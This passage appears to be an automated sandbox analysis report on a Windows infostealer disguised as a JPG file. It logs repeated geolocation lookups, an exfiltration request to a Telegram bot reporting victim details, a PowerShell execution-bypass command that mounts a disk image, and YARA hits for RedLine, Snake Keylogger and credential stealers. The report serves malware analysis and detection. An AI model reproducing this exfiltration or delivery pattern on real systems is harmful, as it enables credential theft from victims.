Host: reallyfreegeoip.org
2024-10-24 16:36:04 UTC | 889 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:04 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 2
Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2jmiyHmAY8L4g6R7rkiKLC6qrDtXtKbGA8zAWgXXbwSqqmVP5uX9yC02XuSUL4EaP%2BulzQaueC%2F%2Bqbkfk31DqJ1pP7q27pfeBGYESMDiRD3dOpV4pvgfyrpVrCFQsFXHVBC2qV5"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8d7b62360cd4558a-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=94232&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40526&cwnd=239&unsent_bytes=0&cid=919372f7e3b0540b&ts=254&x=0"
                                                                                                                                                                                  2024-10-24 16:36:04 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
                                                                                                                                                                                  Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
                                                                                                                                                                                  2024-10-24 16:36:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


Session ID: 3 | Source IP: 192.168.11.20 | Source Port: 49796 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8376 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:04 UTC | 87 | OUT | GET /xml/154.16.192.225 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-24 16:36:04 UTC | 891 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 16:36:04 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 2
    Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7w2F3UxgTpiu3JodPYpKhROHZzKu8KPvpfQWPZ2W8qQUyQ5xcG%2F%2FunGp4CwAHCl18E3OnNE%2FMxGwpbgBuC9gSSP68wGXSNyOwH2UbNLNXcfA8YxVarmSyecccN%2F3LcJ1D85Aj1tH"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d7b623ad8b67cb1-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=94781&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40399&cwnd=252&unsent_bytes=0&cid=c0d6458c2cea6c1e&ts=250&x=0"
2024-10-24 16:36:04 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
    Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
2024-10-24 16:36:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 4 | Source IP: 192.168.11.20 | Source Port: 49798 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8376 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:05 UTC | 87 | OUT | GET /xml/154.16.192.225 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-24 16:36:06 UTC | 885 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 16:36:06 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 4
    Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYHeU%2F3R0zgHfs0vo0IGlWFFoDzfLV3D6sLW8gTl6jA8qAKLESouLcLydnU8USkHeDC4sPgVu476bo9aRrEoaDVXX0pBRtrNDqTJmUzRasSDknYVfd5qN0oho5pWnjvx2XIqB2H6"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d7b62424c1419e7-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=94392&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40480&cwnd=248&unsent_bytes=0&cid=6cbc7f5cb2b794da&ts=253&x=0"
2024-10-24 16:36:06 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
    Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
2024-10-24 16:36:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 5 | Source IP: 192.168.11.20 | Source Port: 49800 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8376 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:06 UTC | 63 | OUT | GET /xml/154.16.192.225 HTTP/1.1
    Host: reallyfreegeoip.org
2024-10-24 16:36:06 UTC | 899 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 16:36:06 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 4
    Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crtuIFd%2Fr8KLAJ%2F%2FZwKkrAp%2Fn6r1889H1O5ysW9DDuWlHVUVXq6qJL727KRdulkIQH%2BJeGUfS9h90EKShl%2FOOUHTK7k0fktdV9a%2B6nHzePBxGO6Sv3O2CN61%2FNRLX6YDhpufENMl"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d7b62472ae80f85-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=94956&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=40253&cwnd=252&unsent_bytes=0&cid=15488c6db32d2e15&ts=259&x=0"
2024-10-24 16:36:06 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
    Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
2024-10-24 16:36:06 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 6 | Source IP: 192.168.11.20 | Source Port: 49802 | Destination IP: 104.21.67.152 | Destination Port: 443 | PID: 8376 | Process: C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:07 UTC | 87 | OUT | GET /xml/154.16.192.225 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-24 16:36:07 UTC | 899 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 16:36:07 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 5
    Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x9vMp6W0JoFETxx2hNgqEbOttSP5i%2F3D2lw2BI%2B0bQ2fF6eqYaBHxLaCNR4i3%2BvpsxCgn7%2BFYq1XLY7CfMkNI4ca%2BajLcgbtNjNc2oEavNNkEqSTLTP%2BlG%2BpUHRrERSrRSs2x3%2Fr"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d7b624bff0c236a-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=94970&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40311&cwnd=241&unsent_bytes=0&cid=444c2cc55971f663&ts=253&x=0"
2024-10-24 16:36:07 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
    Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
2024-10-24 16:36:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 7
Source IP: 192.168.11.20
Source Port: 49804
Destination IP: 104.21.67.152
Destination Port: 443
PID: 8376
Process: C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:08 UTC | 87 | OUT | GET /xml/154.16.192.225 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-24 16:36:08 UTC | 895 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 16:36:08 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 6
    Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YRTGe6GMFixk1fdAUUFLi%2FFcBT5f9B3qtrptUxo9S%2F%2FuemCqlYn2RCr2o2ndnLqFu7LPZTm8%2FZq7MQgNhog8wC4fTVKVCbboIbTfT9QHGoeBfC7Ze5fBLuKNsiJLNP%2FWjNU%2BQ9os"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d7b6250db784349-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=94877&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=40450&cwnd=248&unsent_bytes=0&cid=ff20f6c1afdfe3a8&ts=278&x=0"
2024-10-24 16:36:08 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
    Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
2024-10-24 16:36:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 8
Source IP: 192.168.11.20
Source Port: 49806
Destination IP: 104.21.67.152
Destination Port: 443
PID: 8376
Process: C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:09 UTC | 87 | OUT | GET /xml/154.16.192.225 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-10-24 16:36:09 UTC | 897 | IN | HTTP/1.1 200 OK
    Date: Thu, 24 Oct 2024 16:36:09 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 7
    Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j1VR%2B2Xtx3RxPkIQOvF2RL1ulmXP%2B5upf5FG%2BC%2FLU%2BjDgfx826t35tiUy3F3lxEMDIGgIi3lbA2OJKj3zgZWOWpcpr%2B1AmhF2D7sMo3BFqhjsv6JxFK%2BxwMDA4y2UtmWupH1xlIj"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d7b6255ef2b41fb-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=94322&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40483&cwnd=252&unsent_bytes=0&cid=1f49cc279d62c290&ts=250&x=0"
2024-10-24 16:36:09 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
    Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
2024-10-24 16:36:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 9
Source IP: 192.168.11.20
Source Port: 49807
Destination IP: 149.154.167.220
Destination Port: 443
PID: 8376
Process: C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:09 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2024/10/2024%20/%2020:04:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2024-10-24 16:36:10 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Thu, 24 Oct 2024 16:36:10 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-24 16:36:10 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Target ID: 0
Start time: 12:35:54
Start date: 24/10/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
Imagebase: 0xf90000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 12:35:54
Start date: 24/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7d9000000
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 12:35:54
Start date: 24/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
Imagebase: 0xb80000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 12:35:58
Start date: 24/10/2024
Path: C:\Windows\System32\drivers\udfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size: 344'064 bytes
MD5 hash: 26D2727935221EFB0063B43A74B375BE
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 7
Start time: 12:35:58
Start date: 24/10/2024
Path: \Device\CdRom0\9236-pagaconferma-jpg.exe
Wow64 process (32bit): true
Commandline: "D:\9236-pagaconferma-jpg.exe"
Imagebase: 0x400000
File size: 1'155'263 bytes
MD5 hash: 1AEFAA71B8996D22CAD66A84A7F279A0
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.31560050751.0000000003570000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                  Start time:12:35:59
                                                                                                                                                                                  Start date:24/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"D:\9236-pagaconferma-jpg.exe"
                                                                                                                                                                                  Imagebase:0xba0000
                                                                                                                                                                                  File size:47'016 bytes
                                                                                                                                                                                  MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.33967794321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
